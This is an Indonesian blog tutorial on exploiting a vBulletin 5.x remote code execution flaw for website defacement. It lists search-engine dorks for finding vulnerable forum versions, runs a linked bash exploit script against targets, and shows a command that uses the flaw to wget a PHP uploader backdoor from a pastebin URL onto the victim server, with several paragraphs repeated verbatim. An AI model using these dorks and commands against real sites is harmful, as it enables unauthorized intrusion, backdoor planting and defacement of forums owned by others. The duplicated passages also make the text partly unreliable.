ok kali ini saya akan membagikan tutorial exploit/deface lagi, sesuai judul ya. dulu kita juga pernah bahas vBulletin RCE "tp kok di bahas lagi bang, apa bedanya?"
disini kita menggunakan payload RCE yg berbeda dan letak vulnerable nya juga berbeda, kalau dulu di /ajax/render/widget_php tapi sekarang di /ajax/render/widget_tabbedcontainer_tab_panel dan payload RCE yg digunakan dahulu dan sekarang juga berbeda. saya sudah menginfokan nya di LX-News, silahkan lihat beritanya disini : https://news.linuxploit.com/2020/08/exploit-vbulletin-rce-0day-kembali-ditemukan.html
oke langsung aja ya. disini kita pakai tools bash untuk mengexploitasinya, tidak butuh hackbar yang ada post data. pertama ambil source code tools nya di sini : KLIK ME
untuk dork bisa gunakan :
- intext:"Powered by vBulletin"+"Version 5.5.4"
- intext:"Powered by vBulletin"+"Version 5.5.1"
- intext:"Powered by vBulletin"+"Version 5.5.3" ( kembangkan lagi )
kemudian save dengan nama rce.sh kemudian jalankan toolsnya pada terminal / termux kalian
./rce.sh http://target.com/ "uname -a"
jika command tereksekusi maka akan muncul seperti ini :
disini kita menggunakan payload RCE yg berbeda dan letak vulnerable nya juga berbeda, kalau dulu di /ajax/render/widget_php tapi sekarang di /ajax/render/widget_tabbedcontainer_tab_panel dan payload RCE yg digunakan dahulu dan sekarang juga berbeda. saya sudah menginfokan nya di LX-News, silahkan lihat beritanya disini : https://news.linuxploit.com/2020/08/exploit-vbulletin-rce-0day-kembali-ditemukan.html
oke langsung aja ya. disini kita pakai tools bash untuk mengexploitasinya, tidak butuh hackbar yang ada post data. pertama ambil source code tools nya di sini : KLIK ME
untuk dork bisa gunakan :
- intext:"Powered by vBulletin"+"Version 5.5.4"
- intext:"Powered by vBulletin"+"Version 5.5.1"
- intext:"Powered by vBulletin"+"Version 5.5.3" ( kembangkan lagi )
kemudian save dengan nama rce.sh kemudian jalankan toolsnya pada terminal / termux kalian
./rce.sh http://target.com/ "uname -a"
jika command tereksekusi maka akan muncul seperti ini :
itu tandanya command ter eksekusi, jadi skrg kita upload shell backdoor kita dengan cara
./rce.sh http://target.com/ "wget https://pastebin.com/raw/rEuinSyj -O up.php"
and boom uploader sudah berhasil terupload selebihnya terserah kalian aja :D
./rce.sh http://target.com/ "wget https://pastebin.com/raw/rEuinSyj -O up.php"
and boom uploader sudah berhasil terupload selebihnya terserah kalian aja :D
buat kalian yg ingin copas artikel ini jangan lupa sertakan referensi/sumber ya :D
writed by : Bayu Santoso
Jika Kurang Paham Bisa Lihat Video Di Bawah :